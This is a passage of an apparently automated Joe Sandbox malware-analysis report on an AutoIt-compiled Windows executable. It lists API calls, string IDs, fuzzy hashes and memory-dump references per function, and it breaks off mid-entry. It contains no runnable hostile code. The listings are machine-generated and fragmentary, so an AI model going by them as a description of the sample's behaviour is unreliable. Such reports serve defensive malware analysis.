                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                                  • Opcode ID: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                                                                                                  • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                                                                                                                  • Opcode Fuzzy Hash: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                                                                                                  • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                                                  • Opcode ID: 91910eb341abf589b18a8827fbd5de9ccb9f4f90845a8da4aca72790487ce893
                                                                                                                                                  • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                                                                                                                  • Opcode Fuzzy Hash: 91910eb341abf589b18a8827fbd5de9ccb9f4f90845a8da4aca72790487ce893
                                                                                                                                                  • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 0048A903
                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 0048A945
                                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                                                                                                                  • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0048AA89
                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0048AA94
                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1996641542-0
                                                                                                                                                  • Opcode ID: 9f9ff994320009f47fa3ebfc46be69792ddda53036695cf8c0c8eb91f145c6fb
                                                                                                                                                  • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                                                                                                                  • Opcode Fuzzy Hash: 9f9ff994320009f47fa3ebfc46be69792ddda53036695cf8c0c8eb91f145c6fb
                                                                                                                                                  • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                                                                                                                  • CharNextW.USER32(0000014E), ref: 00488B01
                                                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
• _memset.LIBCMT ref: 00488C44
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
• _memset.LIBCMT ref: 00488CEC
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
• SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
• DrawMenuBar.USER32(?), ref: 00488EC3
• SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
APIs
• GetCursorPos.USER32(?), ref: 004849CA
• GetDesktopWindow.USER32 ref: 004849DF
• GetWindowRect.USER32(00000000), ref: 004849E6
• GetWindowLongW.USER32(?,000000F0), ref: 00484A48
• DestroyWindow.USER32(?), ref: 00484A74
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
• IsWindowVisible.USER32(?), ref: 00484B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
• GetWindowRect.USER32(?,?), ref: 00484B70
• MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
• GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
• CopyRect.USER32(?,?), ref: 00484BC7
• SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
Strings
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
• GetSystemMetrics.USER32(00000007), ref: 004028C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
• GetSystemMetrics.USER32(00000008), ref: 004028F7
• GetSystemMetrics.USER32(00000004), ref: 0040291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
• GetClientRect.USER32(00000000,000000FF), ref: 004029AE
• GetStockObject.GDI32(00000011), ref: 004029CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
  • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
  • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
  • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
  • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
• SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
Strings
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
APIs
Strings
Similarity
• API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
• String ID: {nB${nB
• API String ID: 884005220-2006378465
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
• __swprintf.LIBCMT ref: 0045A51B
• _wcscmp.LIBCMT ref: 0045A52E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
• _wcscmp.LIBCMT ref: 0045A5BF
• GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
• GetDlgCtrlID.USER32(?), ref: 0045A648
• GetWindowRect.USER32(?,?), ref: 0045A67E
• GetParent.USER32(?), ref: 0045A69C
• ScreenToClient.USER32(00000000), ref: 0045A6A3
• GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
• _wcscmp.LIBCMT ref: 0045A731
• GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
• _wcscmp.LIBCMT ref: 0045A76B
  • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
Strings
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
• _wcscmp.LIBCMT ref: 0045AF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
• CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
• _wcscmp.LIBCMT ref: 0045AF8C
• _wcsstr.LIBCMT ref: 0045AF9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
• _wcscmp.LIBCMT ref: 0045AFE5
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
• GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
• _wcscmp.LIBCMT ref: 0045B065
• GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
• GetWindowRect.USER32(00000004,?), ref: 0045B0F6
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• DragQueryPoint.SHELL32(?,?), ref: 0048C627
  • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
  • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
  • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
• _wcscat.LIBCMT ref: 0048C6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
• SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
• SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
• DragFinish.SHELL32(?), ref: 0048C75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
• API String ID: 169749273-3863044002
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
• LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
• LoadCursorW.USER32(00000000,00007F03), ref: 00475029
• LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
• LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
• LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
• LoadCursorW.USER32(00000000,00007F88), ref: 00475055
• LoadCursorW.USER32(00000000,00007F80), ref: 00475060
• LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
• LoadCursorW.USER32(00000000,00007F83), ref: 00475076
• LoadCursorW.USER32(00000000,00007F85), ref: 00475081
• LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
• LoadCursorW.USER32(00000000,00007F84), ref: 00475097
• LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
• LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
• LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
• GetCursorInfo.USER32(?), ref: 004750C8
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
APIs
• _memset.LIBCMT ref: 0048A259
• DestroyWindow.USER32(?,?), ref: 0048A2D3
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
• DestroyWindow.USER32(00000000), ref: 0048A3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
• GetDesktopWindow.USER32 ref: 0048A40D
• GetWindowRect.USER32(00000000), ref: 0048A414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
  • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                                                  • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                  • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                                                                                                  • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                  • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                                  • Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                                                                                  • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                                                                                                                  • Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                                                                                  • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                  • API String ID: 2698844021-4113822522
                                                                                                                                                  • Opcode ID: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                                                                                  • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                                                                                                                  • Opcode Fuzzy Hash: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                                                                                  • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                                                                                                                  • GetFocus.USER32 ref: 0048C20C
                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                                                                                                                  • _memset.LIBCMT ref: 0048C342
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
